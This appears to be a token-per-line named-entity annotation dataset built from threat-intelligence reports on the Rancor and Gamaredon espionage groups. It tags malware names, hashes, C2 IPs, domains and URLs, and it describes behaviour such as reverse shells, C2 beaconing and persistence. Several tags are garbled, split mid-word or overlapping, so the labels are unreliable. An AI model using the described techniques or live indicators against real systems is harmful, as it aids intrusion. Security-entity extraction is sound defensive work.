+Derusbi I-ACT
+or I-ACT
+KHRat I-ACT
+malware I-ACT
+ S-MALon I-ACT
+ S-MALvictim I-ACT
+systems E-ACT
+. O
+
+January B-TIME
+2019 E-TIME
+sent O
+via O
+149.28.156.61 S-IP
+to O
+deliver O
+either O
+Derusbi S-MAL
+or O
+KHRat S-MAL
+samples O
+with O
+either O
+cswksfwq.kfesv.xyz S-DOM
+or O
+connect.bafunpda.xyz S-DOM
+as O
+C2 S-TOOL
+. O
+
+DUDELL S-MAL
+: O
+SHA256 S-ENCR
+: O
+0d61d9baab9927bb484f3e60384fdb6a3709ca74bc6175ab16b220a68f2b349e S-SHA2
+. O
+
+DUDELL S-MAL
+: O
+File O
+Type O
+:M B-TOOL
+icrosoft I-TOOL
+Excel I-TOOL
+97 I-TOOL
+– I-TOO B-IDTYL
+2 E-IDTY003 I-TOOL
+Document E-TOOL
+. O
+
+DUDELL S-MAL
+: O
+File O
+Name O
+:E B-FILE
+quipment I-FILE
+Purchase I-FILE
+List I-FILE
+2018-2020 I-FILE
+(Final I-FILE
+).xls E-FILE
+. O
+
+The O
+DUDELL S-MAL
+sample O
+is O
+a O
+weaponized O
+Microsoft B-TOOL
+Excel B-IDTY I-TOOL E-IDTY
+document E-TOOL
+that O
+contains O
+a O
+malicious B-TOOL
+macro E-TOOL S-TOOL
+that O
+runs O
+on O
+the O
+victim O
+’s O
+machine O
+. O
+
+It O
+shares O
+the O
+same O
+malicious O
+behavior O
+reported O
+by O
+Checkpoint S-IDTY
+in O
+Rancor S-APT
+: O
+The B-MAL
+Year I-MAL
+of I-MAL
+The I-MAL
+Phish E-MAL S-ACT
+SHA-1 S-ENCR
+c829f5f9ff89210c888c1559bb085ec6e65232de S-SHA1
+. O
+
+In O
+Check B-IDTY
+Point E-IDTY
+’s O
+blog O
+, O
+the O
+sample O
+is O
+from O
+December B-TIME
+2018 E-TIME
+while O
+this O
+sample O
+is O
+from O
+April B-TIME
+2018 E-TIME
+. O
+
+The O
+macro S-TOOL
+in O
+this O
+document O
+gets O
+executed O
+when O
+the O
+user O
+views O
+the O
+document O
+and O
+clicks O
+Enable O
+Content O
+, O
+at O
+which O
+point O
+the O
+macro S-TOOL
+locates O
+and O
+executes O
+the O
+data O
+located O
+under O
+the O
+Company O
+field O
+in O
+the O
+document O
+’s O
+properties O
+. O
+
+The O
+C2 S-TOOL
+server O
+199.247.6.253 S-IP
+is O
+known O
+to O
+be O
+used O
+by O
+the O
+Rancor S-APT
+group O
+. O
+
+The O
+script O
+is O
+downloading O
+a O
+second O
+stage O
+payload O
+via O
+the O
+Microsoft S-IDTY
+tool O
+msiexec S-TOOL
+. O
+
+Unfortunately O
+at O
+the O
+time O
+of O
+discovery O
+, O
+the O
+hosted O
+file O
+is O
+unavailable O
+. O
+
+Our O
+systems O
+were O
+able O
+to O
+record O
+the O
+hash O
+of O
+file O
+tmp.vbs S-FILE
+, O
+but O
+the O
+contents O
+of O
+the O
+file O
+are O
+no O
+longer O
+available O
+. O
+
+Pivoting O
+off O
+the O
+filename O
+and O
+directory O
+, O
+we O
+discovered O
+a O
+similar O
+VBS O
+script O
+used O
+by O
+the O
+Rancor S-APT
+actors O
+that O
+might O
+give O
+us O
+some O
+clues O
+on O
+what O
+the O
+contents O
+of O
+tmp.vbs S-FILE
+would O
+resemble O
+. O
+
+File O
+office.vbs S-FILE
+( O
+SHA256 S-ENCR
+: O
+4b0b319b58c2c0980390e24379a2e2a0a1e1a91d17a9d3e26be6f4a39a7afad2 S-SHA2
+) O
+was O
+discovered O
+in O
+directory O
+c:\Windows\System32\spool\drivers\color O
+. O
+
+Hashes O
+for O
+tmp.vbs S-FILE
+:b B-SHA2
+958e481c90939962081b9fb85451a2fb28f705d5b5060f5d9d5aebfb390f8 E-SHA2
+. O
+
+If O
+the O
+file O
+tmp.vbs S-FILE
+does O
+in O
+fact O
+contain O
+similar O
+content O
+as O
+that O
+of O
+office.vbs S-FILE
+, O
+then O
+it O
+could O
+be O
+another O
+method O
+for O
+downloading O
+payloads O
+onto O
+the O
+target O
+. O
+
+DDKONG S-MAL
+Plugin O
+: O
+SHA256 S-ENCR
+: O
+0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707 S-SHA2
+. O
+
+DDKONG S-MAL
+Plugin O
+: O
+Compile O
+Date O
+and O
+Time O
+: O
+2017-02-17 B-TIME
+08:33:45 I-TIME
+AM E-TIME
+. O
+
+DDKONG S-MAL
+Plugin O
+: O
+File O
+Type O
+: O
+PE32 O
+executable O
+( O
+DLL S-TOOL
+) O
+Intel O
+80386, O
+for O
+MS B-OS
+Windows E-OS
+. O
+
+DDKONG S-MAL
+Plugin O
+: O
+File O
+Name O
+: O
+H B-FILE
+istory.nls E-FILE
+. O
+
+The O
+DllInstall S-MAL
+export O
+function O
+is O
+responsible O
+for O
+the O
+core O
+behavior O
+of O
+the O
+malware O
+, O
+as O
+just O
+loading O
+it O
+does O
+nothing O
+. O
+
+Once O
+this O
+export O
+is O
+called O
+, O
+it O
+checks O
+for O
+a O
+hidden O
+window O
+with O
+a O
+caption O
+of O
+Hello O
+Google O
+! O
+
+. O
+
+This O
+check O
+is O
+performed O
+to O
+ensure O
+that O
+only O
+one O
+instance O
+of O
+the O
+malware O
+is O
+running O
+at O
+a O
+time O
+. O
+
+The O
+hidden O
+window O
+created O
+by O
+the O
+malware O
+filters O
+on O
+any O
+user O
+input O
+( O
+e.g O
+. O
+keyboard O
+or O
+mouse O
+activity O
+) O
+. O
+
+This O
+could O
+be O
+an O
+attempt O
+to O
+evade O
+sandbox O
+analysis O
+as O
+mouse O
+and O
+keyboard O
+movement O
+is O
+typically O
+not O
+performed O
+. O
+
+The O
+malware O
+then O
+proceeds O
+to O
+beacon O
+to O
+a O
+configured O
+remote O
+server O
+of O
+cswksfwq.kfesv.xyz S-DOM
+on O
+TCP S-PROT
+port O
+8080 O
+. O
+
+Upon O
+successful O
+connection O
+, O
+the O
+malware O
+transmits O
+victim O
+information O
+such O
+as O
+: O
+hostname O
+, O
+IP O
+address O
+, O
+Language O
+Pack O
+along O
+with O
+other O
+operating O
+system O
+information O
+. O
+
+The O
+data O
+transmitted O
+are O
+XOR S-ENCR
+encoded O
+. O
+
+The O
+malware O
+supports O
+the O
+following O
+capabilities O
+: O
+Terminate O
+specific O
+process、Enumerate O
+processes、Upload O
+file、Download O
+file、Delete O
+file、List O
+folder O
+contents、Enumerate O
+storage O
+volumes、Execute O
+a O
+command、Reverse O
+shell、Take O
+a O
+screenshot O
+. O
+
+KHRAT S-MAL
+: O
+SHA256 S-ENCR
+: O
+aaebf987b8d80d71313c3c0f2c16d60874ffecbdda3bb6b44d6cba6d380 S-SHA2
+. O
+
+KHRAT S-MAL
+: O
+Compile O
+Date O
+and O
+Time O
+: O
+2018-05-02 B-TIME
+05:22:23 I-TIME
+PM E-TIME
+. O
+
+KHRAT S-MAL
+: O
+File O
+Type O
+: O
+PE32 O
+executable O
+( O
+DLL S-TOOL
+) O
+Intel O
+80386, O
+for O
+MS B-OS
+Windows E-OS
+. O
+
+KHRAT S-MAL
+: O
+File O
+Name O
+: O
+8081.dll S-FILE
+. O
+
+Rmcmd O
+: O
+
+When O
+the O
+DLL S-TOOL
+is O
+initially O
+loaded O
+, O
+it O
+dynamically O
+resolves O
+and O
+imports O
+additional O
+modules O
+( O
+DLLs S-TOOL
+’ O
+) O
+needed O
+. O
+
+Once O
+loaded O
+and O
+the O
+export O
+entry O
+of O
+Rmcmd O
+is O
+called O
+, O
+it O
+creates O
+a O
+Windows B-TOOL S-OS I-TOOL
+mutex E-TOOL
+named O
+gkdflbmdfk S-TOOL
+. O
+
+This O
+ensures O
+that O
+only O
+one O
+copy O
+of O
+the O
+malware O
+is O
+running O
+at O
+a O
+time O
+. O
+
+It O
+then O
+begins O
+to O
+beacon O
+to O
+a O
+configured O
+domain O
+of O
+connect.bafunpda.xyz S-DOM
+on O
+TCP S-PROT
+port O
+8081 O
+. O
+
+The O
+malware O
+collects O
+and O
+transmits O
+data O
+from O
+the O
+host O
+, O
+such O
+as O
+hostname O
+and O
+is O
+XOR S-ENCR
+encoded O
+with O
+the O
+first O
+byte O
+of O
+the O
+network O
+traffic O
+being O
+the O
+key O
+. O
+
+Reverse B-TOOL
+Shell E-TOOL
+: O
+
+The O
+malware O
+behavior O
+and O
+code O
+share O
+similarities O
+with O
+an O
+older O
+KHRAT S-MAL
+sample O
+from O
+May B-TIME
+2018 E-TIME
+. O
+
+Sample O
+( O
+SHA256 S-ENCR
+: O
+bc1c3e754be9f2175b718aba62174a550cdc3d98ab9c36671a58073140381659 S-SHA2
+) O
+has O
+the O
+same O
+export O
+entry O
+name O
+and O
+is O
+also O
+a O
+reverse B-TOOL
+shell E-TOOL
+. O
+
+The O
+newer O
+sample O
+appears O
+to O
+be O
+a O
+re-write O
+for O
+optimization O
+purposes O
+with O
+the O
+underlying O
+behavior O
+remaining O
+the O
+same O
+, O
+reverse B-TOOL
+shell E-TOOL
+. O
+
+Derusbi S-MAL
+: O
+SHA256 S-ENCR
+: O
+83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2ab S-SHA2
+. O
+
+Derusbi S-MAL
+: O
+Compile O
+Date O
+and O
+Time O
+: O
+2012-09-14 B-TIME
+09:20:12 I-TIME
+AM E-TIME
+. O
+
+Derusbi S-MAL
+: O
+File O
+Type O
+:P O
+E32 O
+executable O
+( O
+DLL S-TOOL
+) O
+Intel O
+80386, O
+for O
+MS B-OS
+Windows E-OS
+. O
+
+Derusbi S-MAL
+: O
+File O
+Name O
+: O
+32.dll S-FILE
+. O
+
+Derusbi S-MAL
+is O
+a O
+backdoor B-MAL S-MAL I-MAL
+Trojan E-MAL S-MAL
+believed O
+to O
+be O
+used O
+among O
+a O
+small O
+group O
+of O
+attackers O
+, O
+which O
+includes O
+the O
+Rancor S-APT
+group O
+. O
+
+This O
+particular O
+sample O
+is O
+a O
+loader O
+that O
+loads O
+an O
+encrypted O
+payload O
+for O
+its O
+functionality O
+. O
+
+This O
+DLL S-TOOL
+requires O
+the O
+loading O
+executable O
+to O
+include O
+a O
+32-byte O
+key O
+on O
+the O
+command O
+line O
+to O
+be O
+able O
+to O
+decrypt O
+the O
+embedded O
+payload O
+, O
+which O
+unfortunately O
+we O
+do O
+not O
+have O
+. O
+
+Even O
+though O
+we O
+don’t O
+have O
+the O
+decryption O
+key O
+or O
+loader O
+, O
+we O
+have O
+uncovered O
+some O
+interesting O
+artifacts O
+. O
+
+If O
+the O
+module O
+that O
+loads O
+the O
+sample O
+is O
+named O
+myapp.exe S-FILE
+the O
+module O
+will O
+exit O
+Once O
+loaded O
+, O
+it O
+sleeps O
+for O
+six O
+seconds O
+. O
+
+Looks O
+for O
+a O
+Windows S-OS
+pipe O
+named O
+\\.\pipe\_kernel32.dll.ntdll.dll.user32.dll S-FILE
+. O
+
+Looks O
+for O
+a O
+Windows S-OS
+device O
+named O
+\Device\acpi_010221 O
+. O
+n O
+July B-TIME
+2019 E-TIME
+, O
+we O
+discovered O
+an O
+interesting O
+VBScript S-TOOL
+named O
+Chrome.vbs S-FILE
+( O
+SHA256 S-ENCR
+: O
+0C3D4DFA566F3064A8A408D3E1097C454662860BCACFB6675D2B72739CE449C2 S-SHA2
+) O
+associated O
+with O
+the O
+Rancor S-APT
+group O
+. O
+
+This O
+particular O
+VBScript S-TOOL
+payload O
+beacons O
+to O
+domain O
+bafunpda.xyz S-DOM
+, O
+which O
+is O
+also O
+used O
+by O
+the O
+KHRAT S-MAL B-MAL
+Trojan E-MAL S-MAL
+listed O
+above O
+in O
+Table O
+2 O
+. O
+
+This O
+VBScript S-TOOL
+is O
+obfuscated O
+and O
+contains O
+packed O
+data O
+that O
+is O
+used O
+to O
+infect O
+a O
+target O
+with O
+multiple O
+chained O
+persistent O
+artifacts O
+. O
+
+The O
+MOF B-TOOL
+file E-TOOL
+created O
+by O
+the O
+VBScript S-TOOL
+is O
+used O
+as O
+a O
+persistence O
+mechanism O
+via O
+Windows B-TOOL S-OS I-TOOL
+Management I-TOOL
+Instrumentation E-TOOL
+( O
+WMI S-TOOL
+) O
+Event O
+Subscriptions O
+. O
+
+MOF B-TOOL
+files E-TOOL
+are O
+compiled O
+scripts O
+that O
+describe O
+Common B-TOOL
+Information I-TOOL
+Model E-TOOL
+( O
+CIM S-TOOL
+) O
+classes O
+, O
+which O
+are O
+compiled O
+into O
+the O
+WMI S-TOOL
+repository O
+. O
+
+The O
+technique O
+is O
+described O
+by O
+MITRE S-SECTEAM B-TOOL
+ATT&CK I-TOOL
+IDT1084 E-TOOL
+. O
+
+This O
+particular O
+MOF B-TOOL
+file E-TOOL
+creates O
+a O
+timer O
+event O
+that O
+is O
+triggered O
+every O
+five O
+seconds O
+. O
+
+The O
+DLL S-TOOL
+located O
+in O
+the O
+Media B-TOOL
+registry E-TOOL
+key O
+is O
+a O
+variant O
+of O
+the O
+KHRAT B-MAL
+Troja S-MALn E-MAL S-MAL
+. O
+
+It O
+beacons O
+to O
+domain O
+connect.bafunpda.xyz S-DOM
+and O
+attempts O
+to O
+connect O
+to O
+TCP S-PROT
+port O
+4433 O
+. O
+
+This O
+is O
+the O
+same O
+domain O
+used O
+by O
+the O
+KHRAT S-MAL B-MAL
+Trojan E-MAL S-MAL
+. O
+
+Rancor S-APT
+, O
+a O
+cyber O
+espionage O
+group O
+active O
+since O
+at B-TIME
+least I-TIME
+2017 E-TIME
+, O
+continues O
+to O
+conduct O
+targeted O
+attacks O
+in O
+Southeast B-LOC
+Asia E-LOC S-LOC
+and O
+has O
+been O
+found O
+using O
+an O
+undocumented O
+, O
+custom O
+malware O
+family O
+– O
+which O
+we O
+’ve O
+dubbed O
+Dudell S-MAL
+– O
+to O
+download O
+a O
+second O
+stage O
+payload O
+once O
+its O
+malicious O
+macro O
+is O
+executed O
+. O
+
+Additionally O
+, O
+Rancor S-APT
+is O
+also O
+using O
+the O
+Derusbi S-MAL
+malware O
+family O
+to O
+load O
+a O
+secondary O
+payload O
+once O
+it O
+infiltrates O
+a O
+target O
+. O
+
+Rancor S-APT
+: O
+0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707 S-SHA2
+. O
+
+Rancor S-APT
+: O
+AAEBF987B8D80D71313C3C0F2C16D60874FFECBDDA3BB6B44D6CBA6D38031609 S-SHA2
+. O
+
+Rancor S-APT
+: O
+0D61D9BAAB9927BB484F3E60384FDB6A3709CA74BC6175AB16B220A68F2B349E S-SHA2
+. O
+
+Rancor S-APT
+: O
+DB982B256843D8B6429AF24F766636BB0BF781B471922902D8DCF08D0C58511E S-SHA2
+. O
+
+Rancor S-APT
+: O
+CC081FFEA6F4769733AF9D0BAE0308CA0AE63667FA225E7965DF0884E96E2D2A S-SHA2
+. O
+
+Rancor S-APT
+: O
+BC1C3E754BE9F2175B718ABA62174A550CDC3D98AB9C36671A58073140381659 S-SHA2
+. O
+
+Rancor S-APT
+: O
+83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2abd9e0d S-SHA2
+. O
+
+Rancor S-APT
+: O
+cswksfwq.kfesv.xyz S-DOM
+. O
+
+Rancor S-APT
+: O
+Connect.bafunpda.xyz S-DOM
+. O
+
+Rancor S-APT
+: O
+199.247.6.253 S-IP
+. O
+
+
+Cyberwarfare O
+: O
+A O
+deep O
+dive O
+into O
+the O
+latest O
+Gamaredon S-APT
+Espionage O
+Campaign O
+. O
+
+Gamaredon S-APT
+Group O
+is O
+a O
+Cyber O
+Espionage O
+persistent O
+operation O
+attributed O
+to O
+Russians B-IDTY
+FSB E-IDTY
+( O
+Federal B-IDTY
+Security I-IDTY
+Service E-IDTY
+) O
+in O
+a O
+long-term O
+military O
+and O
+geo-political O
+confrontation O
+against O
+the O
+Ukrainian B-IDTY
+government E-IDTY
+and O
+more O
+in O
+general O
+against O
+the O
+Ukrainian O
+military O
+power O
+. O
+
+Gamaredon S-APT
+has O
+been O
+active O
+since O
+2014 S-TIME
+, O
+and O
+during O
+this O
+time O
+, O
+the O
+modus O
+operandi O
+has O
+remained O
+almost O
+the O
+same O
+. O
+
+The O
+most O
+used O
+malware O
+implant O
+is O
+dubbed O
+Pteranodon S-MAL
+or O
+Pterodo S-MAL
+and O
+consists O
+of O
+a O
+multistage O
+backdoor S-MAL
+designed O
+to O
+collect O
+sensitive O
+information O
+or O
+maintaining O
+access O
+on O
+compromised O
+machines O
+. O
+
+It O
+is O
+distributed O
+in O
+a O
+spear B-ACT
+phishing I-ACT
+campaign E-ACT
+with O
+a O
+weaponized O
+office S-TOOL
+document O
+that O
+appears O
+to O
+be O
+designed O
+to O
+lure O
+military O
+personnel O
+. O
+
+In O
+the O
+recent O
+months O
+, O
+Ukrainian B-SECTEAM
+CERT E-SECTEAM
+( O
+CERT-UA S-SECTEAM
+) O
+reported O
+an O
+intensification O
+of O
+Gamaredon B-ACT S-APT I-ACT
+Cyberattacks E-ACT
+against O
+military O
+targets O
+. O
+
+The O
+new O
+wave O
+dates O
+back O
+to O
+the O
+end O
+of O
+November B-TIME
+2019 E-TIME
+and O
+was O
+first O
+analyzed O
+by O
+Vitali O
+Kremez O
+. O
+
+Starting O
+from O
+those O
+findings O
+, O
+Cybaze-Yoroi B-SECTEAM
+ZLab I-SECTEAM
+team E-SECTEAM
+decided O
+to O
+deep O
+dive O
+into O
+a O
+technical O
+analysis O
+of O
+the O
+latest O
+Pterodo S-MAL
+implant O
+. O
+
+The O
+complex O
+infection O
+chain O
+begins O
+with O
+a O
+weaponized O
+Office S-TOOL
+document O
+named O
+“ O
+f.doc S-FILE
+” O
+. O
+
+Hash O
+: O
+76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a S-SHA2
+
+Threat O
+: O
+Gamaredon S-APT
+Pteranodon S-MAL
+weaponized O
+document O
+. O
+
+Brief O
+Description O
+: O
+Doc O
+file O
+weaponized O
+with O
+Exploit O
+. O
+
+Ssdeep S-TOOL
+: O
+768:u0foGtYZKQ5QZJQ6hKVsEEIHNDxpy3TI3dU4DKfLX9Eir O
+: O
+uG1aKQ5OwCrItq3TgGfLt9r O
+. O
+
+The O
+decoy O
+document O
+is O
+written O
+using O
+the O
+ukrainian O
+language O
+mixed O
+to O
+many O
+special O
+chars O
+aimed O
+to O
+lure O
+the O
+target O
+to O
+click O
+on O
+it O
+. O
+
+The O
+document O
+leverages O
+the O
+common O
+exploit O
+aka O
+template O
+injection O
+and O
+tries O
+to O
+download O
+a O
+second O
+stage O
+from O
+“ O
+http://win-apu.ddns.net/apu.dot S-IP
+” O
+. O
+
+Thanks O
+to O
+this  O
+exploit O
+( O
+Remote B-VULNAME
+Code I-VULNAME
+Execution E-VULNAME
+exploit O
+) O
+the O
+user O
+interaction O
+is O
+not O
+required O
+, O
+in O
+fact O
+the O
+“ O
+enable O
+macro S-TOOL
+” O
+button O
+is O
+not O
+shown O
+. O
+
+The O
+downloaded O
+document O
+has O
+a O
+“ O
+.dot S-FILE
+” O
+extension O
+, O
+used O
+by O
+Microsoft B-TOOL
+Office E-TOOL
+to O
+save O
+templates O
+for O
+different O
+documents O
+with O
+similar O
+formats O
+. O
+
+Basic O
+Information O
+on O
+the O
+“ O
+.dot S-FILE
+” O
+file O
+are O
+provided O
+: O
+
+Hash O
+: O
+e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8 S-SHA2
+. O
+
+Threat O
+: O
+Gamaredon S-APT
+Pteranodon S-MAL
+loader O
+dot O
+file O
+. O
+
+Brief O
+Description O
+: O
+Dot O
+file O
+enabling O
+the O
+infection O
+of O
+the O
+Gamaredon S-APT
+Pteranodon S-MAL
+. O
+
+Ssdeep S-TOOL
+: O
+768:5KCB8tnh7oferuHpC0xw+hnF4J7EyKfJ O
+: O
+oI8XoWruHpp/P4 O
+. O
+
+If O
+we O
+decide O
+to O
+open O
+the O
+document O
+, O
+we O
+see O
+that O
+the O
+document O
+is O
+empty O
+, O
+but O
+it O
+requires O
+the O
+enabling O
+of O
+the O
+macro S-TOOL
+. O
+
+The O
+body O
+of O
+the O
+macro S-TOOL
+can O
+be O
+logically O
+divided O
+into O
+two O
+distinct O
+parts O
+: O
+
+The O
+first O
+one O
+is O
+the O
+setting O
+of O
+the O
+registry O
+key O
+“ O
+HKEY_CURRENT_USER\Software\Microsoft\Office\ O
+” O
+& O
+Application.Version O
+& O
+_ O
+” O
+\Word\Security\ O
+” O
+and O
+the O
+declaration O
+of O
+some O
+other O
+variables O
+, O
+such O
+as O
+the O
+dropurl O
+“ O
+geticons.ddns.net O
+” O
+. O
+
+The O
+second O
+one O
+is O
+the O
+setting O
+of O
+the O
+persistence O
+mechanism O
+through O
+the O
+writing O
+of O
+the O
+vbs O
+code O
+in O
+the O
+Startup O
+folder O
+with O
+name O
+“ O
+templates.vbs S-FILE
+” O
+. O
+
+This O
+vbs O
+is O
+properly O
+the O
+macro O
+executed O
+by O
+the O
+macro O
+engine O
+of O
+word O
+. O
+
+Analyzing O
+the O
+content O
+of O
+“ O
+templates.vbs S-FILE
+” O
+it O
+is O
+possible O
+to O
+notice O
+that O
+it O
+define O
+a O
+variable O
+containing O
+a O
+URL O
+like O
+“ O
+http://geticons.ddns.net/ADMIN-PC_E42CAF54//autoindex B-URL
+. E-URL
+]php O
+” O
+obtained O
+from O
+“ O
+hxp://get-icons.ddns B-URL
+. I-URL
+]net/ I-URL
+” I-URL
+& I-URL
+NlnQCJG I-URL
+& I-URL
+“ I-URL
+_ I-URL
+” I-URL
+& I-URL
+uRDEJCn I-URL
+& I-URL
+“ I-URL
+//autoindex I-URL
+. I-URL
+]php E-URL
+” O
+, O
+where O
+“ O
+NlnQCJG O
+” O
+is O
+the O
+name O
+that O
+identifies O
+the O
+computer O
+on O
+the O
+network O
+and O
+“ O
+uRDEJCn O
+” O
+is O
+the O
+serial O
+number O
+of O
+drive O
+in O
+hexadecimal O
+encoding O
+. O
+
+From O
+this O
+URL O
+it O
+tries O
+to O
+download O
+another O
+stage O
+then O
+storing O
+it O
+into O
+“ O
+C:\Users\admin\AppData\Roaming\ O
+” O
+path O
+with O
+random O
+name O
+. O
+
+At O
+the O
+end O
+, O
+“ O
+templates.vbs S-FILE
+” O
+script O
+will O
+force O
+the O
+machine O
+to O
+reboot O
+. O
+
+The O
+dropped O
+sample O
+is O
+an O
+SFX B-TOOL
+archive E-TOOL
+, O
+like O
+the O
+tradition O
+of O
+Gamaredon S-APT
+implants O
+. O
+
+Hash O
+: O
+c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f S-SHA2
+. O
+
+Threat O
+: O
+Gamaredon S-APT
+Pteranodon S-MAL
+implant O
+SFX B-TOOL
+archive E-TOOL
+. O
+
+Brief O
+Description O
+: O
+SFX O
+Archive O
+First O
+Stage O
+. O
+
+Ssdeep S-TOOL
+: O
+24576:zXwOrRsTQlIIIIwIEuCRqKlF8kmh/ZGg4kAL/WUKN7UMOtcv O
+: O
+zgwR/lIIIIwI6RqoukmhxGgZ+WUKZUMv O
+. O
+
+By O
+simply O
+opening O
+the O
+SFX B-TOOL
+archive E-TOOL
+, O
+it O
+is O
+possible O
+to O
+notice O
+two O
+different O
+files O
+that O
+are O
+shown O
+below O
+and O
+named O
+respectively O
+“ O
+8957.cmd S-FILE
+” O
+and O
+“ O
+28847 S-FILE
+” O
+. O
+
+When O
+executed O
+, O
+the O
+SFX B-TOOL
+archive E-TOOL
+will O
+be O
+extracted O
+and O
+the O
+“ O
+8957.cmd S-FILE
+” O
+will O
+be O
+run O
+. O
+
+At O
+this O
+point O
+, O
+the O
+batch O
+script O
+renames O
+the O
+“ O
+28847 S-FILE
+” O
+file O
+in O
+“ O
+28847.exe S-FILE
+” O
+, O
+opens O
+it O
+using O
+“ O
+pfljk O
+,fkbcerbgblfhs O
+” O
+as O
+password O
+and O
+the O
+file O
+contained O
+inside O
+the O
+“ O
+28847.exe S-FILE
+” O
+file O
+will O
+be O
+renamed O
+in O
+“ O
+WuaucltIC.exe S-FILE
+” O
+. O
+
+Finally O
+, O
+it O
+will O
+be O
+run O
+using O
+“ O
+post.php S-FILE
+” O
+as O
+argument O
+. O
+
+The O
+fact O
+that O
+the O
+“ O
+28847.exe S-FILE
+” O
+file O
+can O
+be O
+opened O
+makes O
+us O
+understand O
+that  O
+the O
+“ O
+28847 S-FILE
+” O
+file O
+is O
+another O
+SFX S-TOOL
+file O
+. O
+
+Some O
+static O
+information O
+about O
+SFX S-TOOL
+are O
+: O
+
+Hash O
+: O
+3dfadf9f23b4c5d17a0c5f5e89715d239c832dbe78551da67815e41e2000fdf1 S-SHA2
+. O
+
+Threat O
+: O
+Gamaredon S-APT
+Pteranodon S-MAL
+implant O
+SFX B-TOOL
+archive E-TOOL
+. O
+
+Brief O
+Description O
+: O
+SFX B-TOOL
+Archive E-TOOL
+Second O
+Stage O
+. O
+
+Ssdeep S-TOOL
+: O
+24576:vmoO8itbaZiW+qJnmCcpv5lKbbJAiUqKXM O
+: O
+OoZwxVvfoaPu O
+. O
+
+Exploring O
+it O
+, O
+it O
+is O
+possible O
+to O
+see O
+several O
+files O
+inside O
+of O
+it O
+,  O
+as O
+well O
+as O
+the O
+6323 S-FILE
+file O
+. O
+
+In O
+this O
+case O
+, O
+the O
+SFX B-FILE
+archive E-FILE
+contains O
+8 O
+files O
+: O
+���ve O
+of O
+them O
+are O
+legit O
+DLLs S-TOOL
+used O
+by O
+the O
+“ O
+6323 S-FILE
+” O
+executable O
+to O
+interoperate O
+with O
+the O
+OLE S-TOOL
+format O
+defined O
+and O
+used O
+by O
+Microsoft B-TOOL
+Office E-TOOL
+. O
+
+The O
+“ O
+ExcelMyMacros.txt S-FILE
+” O
+and O
+“ O
+wordMacros.txt S-FILE
+” O
+files O
+contain O
+further O
+macro O
+script O
+, O
+described O
+next O
+. O
+
+So O
+, O
+static O
+analysis O
+on O
+the O
+“ O
+6323 S-FILE
+” O
+file O
+shown O
+as O
+its O
+nature O
+: O
+it O
+is O
+written O
+using O
+Microsoft B-TOOL
+Visual I-TOOL
+Studio I-TOOL
+.NET E-TOOL
+, O
+therefore O
+easily O
+to O
+reverse O
+. O
+
+Before O
+reversing O
+the O
+executable O
+, O
+it O
+is O
+possible O
+to O
+clean O
+it O
+allowing O
+the O
+size O
+reduction O
+and O
+the O
+junk O
+instruction O
+reduction O
+inside O
+the O
+code O
+. O
+
+The O
+below O
+image O
+shows O
+the O
+information O
+about O
+the O
+sample O
+before O
+and O
+after O
+the O
+cleaning O
+. O
+
+The O
+first O
+check O
+performed O
+is O
+on O
+the O
+arguments O
+: O
+if O
+the O
+arguments O
+length O
+is O
+equal O
+to O
+zero O
+, O
+the O
+malware O
+terminates O
+the O
+execution O
+. O
+
+After O
+that O
+, O
+the O
+malware O
+checks O
+if O
+the O
+existence O
+of O
+the O
+files O
+“ O
+ExcelMyMacros.txt S-FILE
+” O
+and O
+“ O
+wordMacros.txt S-FILE
+” O
+in O
+the O
+same O
+path O
+where O
+it O
+is O
+executed O
+: O
+if O
+true O
+then O
+it O
+reads O
+their O
+contents O
+otherwise O
+it O
+will O
+exit O
+. O
+
+As O
+visible O
+in O
+the O
+previous O
+figure O
+, O
+the O
+only O
+difference O
+between O
+the O
+files O
+are O
+in O
+the O
+variable O
+, O
+registry O
+key O
+and O
+path O
+used O
+by O
+Word O
+rather O
+than O
+by O
+Excel S-TOOL
+. O
+
+Finally O
+the O
+macros S-TOOL
+are O
+executed O
+using O
+the O
+Office S-TOOL
+engine O
+. O
+
+So O
+let O
+’s O
+start O
+to O
+dissect O
+the O
+macros S-TOOL
+. O
+
+For O
+a O
+better O
+comprehension O
+we O
+will O
+be O
+considering O
+only O
+one O
+macro S-TOOL
+and O
+in O
+the O
+specific O
+case O
+we O
+will O
+analyze O
+“ O
+wordMacros.txt S-FILE
+” O
+  O
+ones O
+. O
+
+First O
+of O
+all O
+the O
+macro S-TOOL
+will O
+set O
+the O
+registry O
+key O
+“ O
+HKEY_CURRENT_USER\Software\Microsoft\Office\ O
+” O
+& O
+Application.Version O
+& O
+_ O
+” O
+\Word\Security\ O
+” O
+and O
+then O
+will O
+set O
+up O
+two O
+scheduled O
+tasks O
+that O
+will O
+start O
+respectively O
+every O
+12 O
+and O
+15 O
+minutes O
+: O
+the O
+first O
+one O
+will O
+run O
+a O
+“ O
+IndexOffice.vbs S-FILE
+” O
+in O
+the O
+path O
+“ O
+%APPDATA%\Microsoft\Office\ O
+” O
+and O
+the O
+second O
+one O
+will O
+run O
+“ O
+IndexOffice.exe S-FILE
+” O
+in O
+the O
+same O
+path O
+. O
+
+Finally O
+, O
+the O
+malware O
+will O
+write O
+the O
+“ O
+IndexOffice.txt S-FILE
+” O
+file O
+in O
+the  O
+“ O
+%APPDATA%\Microsoft\Office\ O
+” O
+path O
+. O
+
+The O
+script O
+will O
+check O
+the O
+presence O
+of O
+the  O
+“ O
+IndexOffice.exe S-FILE
+” O
+artifact O
+: O
+if O
+true O
+then O
+it O
+will O
+delete O
+it O
+and O
+it O
+will O
+download O
+a O
+new O
+file/script O
+from O
+“ O
+http://masseffect.space/<PC_Name>_<Hex_Drive_SN>/post.php S-URL
+” O
+. O
+
+The O
+malware O
+tries O
+to O
+save O
+the O
+C2 S-TOOL
+response O
+and O
+encoding O
+it O
+using O
+Encode O
+function O
+. O
+
+This O
+function O
+accepts O
+three O
+parameters O
+: O
+the O
+input O
+file O
+, O
+the O
+output O
+file O
+and O
+the O
+arrKey O
+; O
+arrKey O
+is O
+calculated O
+thanks O
+to  O
+GetKey O
+function O
+that O
+accepts O
+as O
+input O
+the O
+Hexadecimal O
